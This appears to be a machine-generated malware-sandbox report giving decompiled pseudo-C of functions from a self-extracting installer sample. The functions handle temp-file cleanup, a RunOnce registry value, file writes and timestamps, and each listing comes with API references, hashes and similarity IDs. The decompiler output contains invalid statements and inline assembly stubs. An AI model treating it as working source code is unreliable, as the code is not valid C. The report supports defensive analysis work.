			E012552B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v268;
				signed int _t9;
				signed int _t11;
				void* _t21;
				void* _t29;
				CHAR** _t31;
				void* _t32;
				signed int _t33;

				_t28 = __edi;
				_t22 = __ecx;
				_t21 = __ebx;
				_t9 =  *0x1258004; // 0x958f311c
				_v8 = _t9 ^ _t33;
				_push(__esi);
				_t31 =  *0x12591e0; // 0xa57c40
				if(_t31 != 0) {
					_push(__edi);
					do {
						_t29 = _t31;
						if( *0x1258a24 == 0 &&  *0x1259a30 == 0) {
							SetFileAttributesA( *_t31, 0x80); // executed
							DeleteFileA( *_t31); // executed
						}
						_t31 = _t31[1];
						LocalFree( *_t29);
						LocalFree(_t29);
					} while (_t31 != 0);
					_pop(_t28);
				}
				_t11 =  *0x1258a20; // 0x0
				_pop(_t32);
				if(_t11 != 0 &&  *0x1258a24 == 0 &&  *0x1259a30 == 0) {
					_push(_t22);
					E01251781( &_v268, 0x104, _t22, "C:\Users\engineer\AppData\Local\Temp\IXP002.TMP\");
					if(( *0x1259a34 & 0x00000020) != 0) {
						E012565E8( &_v268);
					}
					SetCurrentDirectoryA(".."); // executed
					_t22 =  &_v268;
					E01252390( &_v268);
					_t11 =  *0x1258a20; // 0x0
				}
				if( *0x1259a40 != 1 && _t11 != 0) {
					_t11 = E01251FE1(_t22); // executed
				}
				 *0x1258a20 =  *0x1258a20 & 0x00000000;
				return E01256CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
			}

0x012552b6
0x012552b6
0x012552b6
0x012552c1
0x012552c8
0x012552cb
0x012552cc
0x012552d4
0x012552d6
0x012552d7
0x012552de
0x012552e0
0x012552f2
0x012552fa
0x012552fa
0x01255302
0x01255305
0x0125530c
0x01255312
0x01255316
0x01255316
0x01255317
0x0125531c
0x0125531f
0x01255333
0x01255345
0x01255351
0x01255359
0x01255359
0x01255363
0x01255369
0x0125536f
0x01255374
0x01255374
0x01255381
0x01255387
0x01255387
0x0125538f
0x012553a0

APIs

SetFileAttributesA.KERNELBASE(00A57C40,00000080,?,00000000), ref: 012552F2
DeleteFileA.KERNELBASE(00A57C40), ref: 012552FA
LocalFree.KERNEL32(00A57C40,?,00000000), ref: 01255305
LocalFree.KERNEL32(00A57C40), ref: 0125530C
SetCurrentDirectoryA.KERNELBASE(012511FC,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 01255363

Strings

C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 01255334

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
API String ID: 2833751637-1525623783
Opcode ID: 3aa4c66438815742ba8e79e3a5c032b543157ee670a9da4a7dc52a56b884990b
Instruction ID: 94518f25ddba4655416063899049262477f38b0b9af6028a1adcab9e78f6ef0c
Opcode Fuzzy Hash: 3aa4c66438815742ba8e79e3a5c032b543157ee670a9da4a7dc52a56b884990b
Instruction Fuzzy Hash: 9621DE31930316EBDFB19B28F8CDB793BA4BB00314F040258EE4A53199DBF09984CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01251FE1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01251FE1(void* __ecx) {
				void* _v8;
				long _t4;

				if( *0x1258530 != 0) {
					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
					if(_t4 == 0) {
						RegDeleteValueA(_v8, "wextract_cleanup2"); // executed
						return RegCloseKey(_v8);
					}
				}
				return _t4;
			}

0x01251fee
0x01252005
0x0125200d
0x01252017
0x00000000
0x01252020
0x0125200d
0x01252029

APIs

RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,0125538C,?,?,0125538C), ref: 01252005
RegDeleteValueA.KERNELBASE(0125538C,wextract_cleanup2,?,?,0125538C), ref: 01252017
RegCloseKey.ADVAPI32(0125538C,?,?,0125538C), ref: 01252020

Strings

Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 01251FFB
wextract_cleanup2, xrefs: 01251FE7, 0125200F

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup2
API String ID: 849931509-3354236729
Opcode ID: 8e1d87c4dcce840739a4196fe5e711f1551a7d30199ec74ea101bcf3346e005d
Instruction ID: 1531b050122f1e32df7905dee8ce748e8aa7448934f67e2a88b73843b0a1aaa0
Opcode Fuzzy Hash: 8e1d87c4dcce840739a4196fe5e711f1551a7d30199ec74ea101bcf3346e005d
Instruction Fuzzy Hash: 8CE01A30571318FBEB718E92FC8FF6A7A2AF700744F100299BE04A1055EBB19A10D704

Uniqueness

Uniqueness Score: -1.00%

Function 01254CD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E01254CD0(char* __edx, long _a4, int _a8) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				int _t30;
				long _t32;
				signed int _t33;
				long _t35;
				long _t36;
				struct HWND__* _t37;
				long _t38;
				long _t39;
				long _t41;
				long _t44;
				long _t45;
				long _t46;
				signed int _t50;
				long _t51;
				char* _t58;
				long _t59;
				char* _t63;
				long _t64;
				CHAR* _t71;
				CHAR* _t74;
				int _t75;
				signed int _t76;

				_t69 = __edx;
				_t29 =  *0x1258004; // 0x958f311c
				_t30 = _t29 ^ _t76;
				_v8 = _t30;
				_t75 = _a8;
				if( *0x12591d8 == 0) {
					_t32 = _a4;
					__eflags = _t32;
					if(_t32 == 0) {
						_t33 = E01254E99(_t75);
						L35:
						return E01256CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
					}
					_t35 = _t32 - 1;
					__eflags = _t35;
					if(_t35 == 0) {
						L9:
						_t33 = 0;
						goto L35;
					}
					_t36 = _t35 - 1;
					__eflags = _t36;
					if(_t36 == 0) {
						_t37 =  *0x1258584; // 0x0
						__eflags = _t37;
						if(_t37 != 0) {
							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
						}
						_t54 = 0x12591e4;
						_t58 = 0x12591e4;
						do {
							_t38 =  *_t58;
							_t58 =  &(_t58[1]);
							__eflags = _t38;
						} while (_t38 != 0);
						_t59 = _t58 - 0x12591e5;
						__eflags = _t59;
						_t71 =  *(_t75 + 4);
						_t73 =  &(_t71[1]);
						do {
							_t39 =  *_t71;
							_t71 =  &(_t71[1]);
							__eflags = _t39;
						} while (_t39 != 0);
						_t69 = _t71 - _t73;
						_t30 = _t59 + 1 + _t71 - _t73;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							L3:
							_t33 = _t30 | 0xffffffff;
							goto L35;
						}
						_t69 = 0x12591e4;
						_t30 = E01254702( &_v268, 0x12591e4,  *(_t75 + 4));
						__eflags = _t30;
						if(__eflags == 0) {
							goto L3;
						}
						_t41 = E0125476D( &_v268, __eflags);
						__eflags = _t41;
						if(_t41 == 0) {
							goto L9;
						}
						_push(0x180);
						_t30 = E01254980( &_v268, 0x8302); // executed
						_t75 = _t30;
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							goto L3;
						}
						_t30 = E012547E0( &_v268);
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						 *0x12593f4 =  *0x12593f4 + 1;
						_t33 = _t75;
						goto L35;
					}
					_t44 = _t36 - 1;
					__eflags = _t44;
					if(_t44 == 0) {
						_t54 = 0x12591e4;
						_t63 = 0x12591e4;
						do {
							_t45 =  *_t63;
							_t63 =  &(_t63[1]);
							__eflags = _t45;
						} while (_t45 != 0);
						_t74 =  *(_t75 + 4);
						_t64 = _t63 - 0x12591e5;
						__eflags = _t64;
						_t69 =  &(_t74[1]);
						do {
							_t46 =  *_t74;
							_t74 =  &(_t74[1]);
							__eflags = _t46;
						} while (_t46 != 0);
						_t73 = _t74 - _t69;
						_t30 = _t64 + 1 + _t74 - _t69;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							goto L3;
						}
						_t69 = 0x12591e4;
						_t30 = E01254702( &_v268, 0x12591e4,  *(_t75 + 4));
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						_t69 =  *((intOrPtr*)(_t75 + 0x18));
						_t30 = E01254C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						E01254B60( *((intOrPtr*)(_t75 + 0x14))); // executed
						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
						__eflags = _t50;
						if(_t50 != 0) {
							_t51 = _t50 & 0x00000027;
							__eflags = _t51;
						} else {
							_t51 = 0x80;
						}
						_t30 = SetFileAttributesA( &_v268, _t51); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						} else {
							_t33 = 1;
							goto L35;
						}
					}
					_t30 = _t44 - 1;
					__eflags = _t30;
					if(_t30 == 0) {
						goto L3;
					}
					goto L9;
				}
				if(_a4 == 3) {
					_t30 = E01254B60( *((intOrPtr*)(_t75 + 0x14)));
				}
				goto L3;
			}

0x01254cd0
0x01254cdb
0x01254ce0
0x01254ce2
0x01254cee
0x01254cf2
0x01254d0e
0x01254d0e
0x01254d11
0x01254e83
0x01254e88
0x01254e98
0x01254e98
0x01254d17
0x01254d17
0x01254d1a
0x01254d2f
0x01254d2f
0x00000000
0x01254d2f
0x01254d1c
0x01254d1c
0x01254d1f
0x01254dcb
0x01254dd0
0x01254dd2
0x01254ddd
0x01254ddd
0x01254de3
0x01254de8
0x01254ded
0x01254ded
0x01254def
0x01254df0
0x01254df0
0x01254df4
0x01254df4
0x01254df6
0x01254df9
0x01254dfc
0x01254dfc
0x01254dfe
0x01254dff
0x01254dff
0x01254e03
0x01254e08
0x01254e0a
0x01254e0f
0x01254d03
0x01254d03
0x00000000
0x01254d03
0x01254e18
0x01254e20
0x01254e25
0x01254e27
0x00000000
0x00000000
0x01254e33
0x01254e38
0x01254e3a
0x00000000
0x00000000
0x01254e40
0x01254e51
0x01254e56
0x01254e5b
0x01254e5e
0x00000000
0x00000000
0x01254e6a
0x01254e6f
0x01254e71
0x00000000
0x00000000
0x01254e77
0x01254e7d
0x00000000
0x01254e7d
0x01254d25
0x01254d25
0x01254d28
0x01254d36
0x01254d3b
0x01254d40
0x01254d40
0x01254d42
0x01254d43
0x01254d43
0x01254d47
0x01254d4a
0x01254d4a
0x01254d4c
0x01254d4f
0x01254d4f
0x01254d51
0x01254d52
0x01254d52
0x01254d56
0x01254d5b
0x01254d5d
0x01254d62
0x00000000
0x00000000
0x01254d67
0x01254d6f
0x01254d74
0x01254d76
0x00000000
0x00000000
0x01254d7c
0x01254d84
0x01254d89
0x01254d8b
0x00000000
0x00000000
0x01254d94
0x01254d99
0x01254d9e
0x01254da1
0x01254daa
0x01254daa
0x01254da3
0x01254da3
0x01254da3
0x01254db5
0x01254dbb
0x01254dbd
0x00000000
0x01254dc3
0x01254dc5
0x00000000
0x01254dc5
0x01254dbd
0x01254d2a
0x01254d2a
0x01254d2d
0x00000000
0x00000000
0x00000000
0x01254d2d
0x01254cf8
0x01254cfd
0x01254d02
0x00000000

APIs

SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 01254DB5
SetDlgItemTextA.USER32(00000000,00000837,?), ref: 01254DDD

Strings

C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 01254D36, 01254DE3

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: AttributesFileItemText
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
API String ID: 3625706803-1525623783
Opcode ID: ee952d3b4e8ec3d747dfa87a87822a231bb461cbcc4eba4f597281c41af21647
Instruction ID: ba9947fdcbe14f0d8d939e3d42e449b9f75d38719d3db6e3ea2a48555c0a33aa
Opcode Fuzzy Hash: ee952d3b4e8ec3d747dfa87a87822a231bb461cbcc4eba4f597281c41af21647
Instruction Fuzzy Hash: 324168362242838BCFA5BE3CD8C86B5F7A4EB41300F044668CE8697185FA31EAC6C750

Uniqueness

Uniqueness Score: -1.00%

Function 01254C37 Relevance: 4.5, APIs: 3, Instructions: 39
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01254C37(signed int __ecx, int __edx, int _a4) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				FILETIME* _t14;
				int _t15;
				signed int _t21;

				_t21 = __ecx * 0x18;
				if( *((intOrPtr*)(_t21 + 0x1258d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
					L5:
					return 0;
				} else {
					_t14 =  &_v12;
					_t15 = SetFileTime( *(_t21 + 0x1258d74), _t14, _t14, _t14); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 1;
				}
			}

0x01254c40
0x01254c4a
0x01254c8d
0x00000000
0x01254c70
0x01254c70
0x01254c7e
0x01254c86
0x00000000
0x00000000
0x00000000
0x01254c8a

APIs

DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 01254C54
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 01254C66
SetFileTime.KERNELBASE(?,?,?,?), ref: 01254C7E

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: Time$File$DateLocal
String ID:
API String ID: 2071732420-0
Opcode ID: 1eb9366e3c53624b32afa90a14a5aad891b815bc5be5cbf332eaa0411000e084
Instruction ID: ed9458449afae544405f1b90bf3ed5076a46f93ca6180a8f4b70760a8457ac45
Opcode Fuzzy Hash: 1eb9366e3c53624b32afa90a14a5aad891b815bc5be5cbf332eaa0411000e084
Instruction Fuzzy Hash: 08F0967252020E6FAB64EFB9DCC9EBBFBEDEB44151744452AEA15C2000F670D554C760

Uniqueness

Uniqueness Score: -1.00%

Function 0125487A Relevance: 3.1, APIs: 2, Instructions: 59
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0125487A(CHAR* __ecx, signed int __edx) {
				void* _t7;
				CHAR* _t11;
				long _t18;
				long _t23;

				_t11 = __ecx;
				asm("sbb edi, edi");
				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
				if((__edx & 0x00000100) == 0) {
					asm("sbb esi, esi");
					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
				} else {
					if((__edx & 0x00000400) == 0) {
						asm("sbb esi, esi");
						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
					} else {
						_t23 = 1;
					}
				}
				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
				if(_t7 != 0xffffffff || _t23 == 3) {
					return _t7;
				} else {
					E0125490C(_t11);
					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
				}
			}

0x01254880
0x0125488c
0x01254894
0x012548a0
0x012548c9
0x012548ce
0x012548a2
0x012548a8
0x012548b7
0x012548bc
0x012548aa
0x012548ac
0x012548ac
0x012548a8
0x012548de
0x012548e7
0x0125490b
0x012548ee
0x012548f0
0x00000000
0x01254902

APIs

CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,01254A23,?,01254F67,*MEMCAB,00008000,00000180), ref: 012548DE
CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,01254F67,*MEMCAB,00008000,00000180), ref: 01254902

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: e1de406b5371dac0bd4388b3ebcac849c9eb52a77d9f8ba461f0dd5765badc06
Instruction ID: 4ed3ea6660ce1b77e3830b434235fdd7b7c909b1140942304ebebc4506c79d83
Opcode Fuzzy Hash: e1de406b5371dac0bd4388b3ebcac849c9eb52a77d9f8ba461f0dd5765badc06
Instruction Fuzzy Hash: DB014BA3E226B026F36460295CCEFF7991CDB96634F1B0335BEAAE71C1E5745C4482E0

Uniqueness

Uniqueness Score: -1.00%

Function 01254AD0 Relevance: 3.0, APIs: 2, Instructions: 47
fileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E01254AD0(signed int _a4, void* _a8, long _a12) {
				signed int _t9;
				int _t12;
				signed int _t14;
				signed int _t15;
				void* _t20;
				struct HWND__* _t21;
				signed int _t24;
				signed int _t25;

				_t20 =  *0x125858c; // 0x268
				_t9 = E01253680(_t20);
				if( *0x12591d8 == 0) {
					_push(_t24);
					_t12 = WriteFile( *(0x1258d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
					if(_t12 != 0) {
						_t25 = _a12;
						if(_t25 != 0xffffffff) {
							_t14 =  *0x1259400; // 0x56200
							_t15 = _t14 + _t25;
							 *0x1259400 = _t15;
							if( *0x1258184 != 0) {
								_t21 =  *0x1258584; // 0x0
								if(_t21 != 0) {
									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x12593f8, 0);
								}
							}
						}
					} else {
						_t25 = _t24 | 0xffffffff;
					}
					return _t25;
				} else {
					return _t9 | 0xffffffff;
				}
			}

0x01254ad5
0x01254adb
0x01254ae7
0x01254aee
0x01254b05
0x01254b0d
0x01254b14
0x01254b1a
0x01254b1c
0x01254b21
0x01254b2a
0x01254b2f
0x01254b31
0x01254b39
0x01254b54
0x01254b54
0x01254b39
0x01254b2f
0x01254b0f
0x01254b0f
0x01254b0f
0x01254b5e
0x01254ae9
0x01254aed
0x01254aed

APIs

Part of subcall function 01253680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0125369F
Part of subcall function 01253680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 012536B2
Part of subcall function 01253680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 012536DA

WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 01254B05

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: MessagePeek$FileMultipleObjectsWaitWrite
String ID:
API String ID: 1084409-0
Opcode ID: b26fc3e6983e518f43645ee9ffdeb6cb64c161ab16a7995cbf1e9e9641dcda8e
Instruction ID: 6c12a38357afbd03004ec8bda86866a2d08055617c88aa4561b6a3ee0c72acf4
Opcode Fuzzy Hash: b26fc3e6983e518f43645ee9ffdeb6cb64c161ab16a7995cbf1e9e9641dcda8e
Instruction Fuzzy Hash: D601D6316103019BDB649F19FCCABA2BB98F744739F048225FE39971D4E7708891CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0125658A Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0125658A(char* __ecx, void* __edx, char* _a4) {
				intOrPtr _t4;
				char* _t6;
				char* _t8;
				void* _t10;
				void* _t12;
				char* _t16;
				intOrPtr* _t17;
				void* _t18;
				char* _t19;

				_t16 = __ecx;
				_t10 = __edx;
				_t17 = __ecx;
				_t1 = _t17 + 1; // 0x1258b3f
				_t12 = _t1;
				do {
					_t4 =  *_t17;
					_t17 = _t17 + 1;
				} while (_t4 != 0);
				_t18 = _t17 - _t12;
				_t2 = _t18 + 1; // 0x1258b40
				if(_t2 < __edx) {
					_t19 = _t18 + __ecx;
					if(_t19 > __ecx) {
						_t8 = CharPrevA(__ecx, _t19); // executed
						if( *_t8 != 0x5c) {
							 *_t19 = 0x5c;
							_t19 =  &(_t19[1]);
						}
					}
					_t6 = _a4;
					 *_t19 = 0;
					while( *_t6 == 0x20) {
						_t6 = _t6 + 1;
					}
					return E012516B3(_t16, _t10, _t6);
				}
				return 0x8007007a;
			}

0x01256592
0x01256594
0x01256596
0x01256598
0x01256598
0x0125659b
0x0125659b
0x0125659d
0x0125659e
0x012565a2
0x012565a4
0x012565a9
0x012565b2
0x012565b6
0x012565ba
0x012565c3
0x012565c5
0x012565c8
0x012565c8
0x012565c3
0x012565c9
0x012565cc
0x012565d2
0x012565d1
0x012565d1
0x00000000
0x012565dc
0x00000000

APIs

CharPrevA.USER32(01258B3E,01258B3F,00000001,01258B3E,-00000003,?,012560EC,01251140,?), ref: 012565BA

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: CharPrev
String ID:
API String ID: 122130370-0
Opcode ID: 4cf049860e26b6ac5f07580c6fcfc0a8e361b6d35a3cc4bd0f2fe3d8c49a28d4
Instruction ID: f07e0c69f7372c7afd2becb35372ccd24400727a1564cad548f8a1576867b67a
Opcode Fuzzy Hash: 4cf049860e26b6ac5f07580c6fcfc0a8e361b6d35a3cc4bd0f2fe3d8c49a28d4
Instruction Fuzzy Hash: A3F04C321542519FE332091DB8C4B76BFDE9B86154F98016EEEDAC3209CAB58D4583B0

Uniqueness

Uniqueness Score: -1.00%

Function 0125621E Relevance: 1.5, APIs: 1, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0125621E() {
				signed int _v8;
				char _v268;
				signed int _t5;
				void* _t9;
				void* _t13;
				void* _t19;
				void* _t20;
				signed int _t21;

				_t5 =  *0x1258004; // 0x958f311c
				_v8 = _t5 ^ _t21;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					0x4f0 = 2;
					_t9 = E0125597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
				} else {
					E012544B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
					 *0x1259124 = E01256285();
					_t9 = 0;
				}
				return E01256CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
			}

0x01256229
0x01256230
0x01256247
0x0125626a
0x01256272
0x01256249
0x01256255
0x0125625f
0x01256264
0x01256264
0x01256284

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0125623F

Part of subcall function 012544B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01254518
Part of subcall function 012544B9: MessageBoxA.USER32(?,?,siga30,00010010), ref: 01254554

Part of subcall function 01256285: GetLastError.KERNEL32(01255BBC), ref: 01256285

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: DirectoryErrorLastLoadMessageStringWindows
String ID:
API String ID: 381621628-0
Opcode ID: d0e8a88b2a8e5e7b4de376065f17c080b4e5702dbd52e84349f71001aee08e72
Instruction ID: 18e31d3c16b03594434a44f30c13af2b4721f6a6008e2f2819d3c16c82e9ba59
Opcode Fuzzy Hash: d0e8a88b2a8e5e7b4de376065f17c080b4e5702dbd52e84349f71001aee08e72
Instruction Fuzzy Hash: 05F0E970720309ABDBE0EB749D86FBE77BCDB54300F800469AD85D7080ED749D808750

Uniqueness

Uniqueness Score: -1.00%

Function 01254B60 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01254B60(signed int _a4) {
				signed int _t9;
				signed int _t15;

				_t15 = _a4 * 0x18;
				if( *((intOrPtr*)(_t15 + 0x1258d64)) != 1) {
					_t9 = FindCloseChangeNotification( *(_t15 + 0x1258d74)); // executed
					if(_t9 == 0) {
						return _t9 | 0xffffffff;
					}
					 *((intOrPtr*)(_t15 + 0x1258d60)) = 1;
					return 0;
				}
				 *((intOrPtr*)(_t15 + 0x1258d60)) = 1;
				 *((intOrPtr*)(_t15 + 0x1258d68)) = 0;
				 *((intOrPtr*)(_t15 + 0x1258d70)) = 0;
				 *((intOrPtr*)(_t15 + 0x1258d6c)) = 0;
				return 0;
			}

0x01254b66
0x01254b74
0x01254b98
0x01254ba0
0x00000000
0x01254bac
0x01254ba4
0x00000000
0x01254ba4
0x01254b78
0x01254b7e
0x01254b84
0x01254b8a
0x00000000

APIs

FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,01254FA1,00000000), ref: 01254B98

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 50d31f5b0e70d5a315cc6b39ac727e9dcf5dfa71e4e8d90cb6b3460f6da04f9b
Instruction ID: 25a40e67c6f540372985171f76c8dee6d78fad4d610b6f4dc601e1ef9b0c8cf8
Opcode Fuzzy Hash: 50d31f5b0e70d5a315cc6b39ac727e9dcf5dfa71e4e8d90cb6b3460f6da04f9b
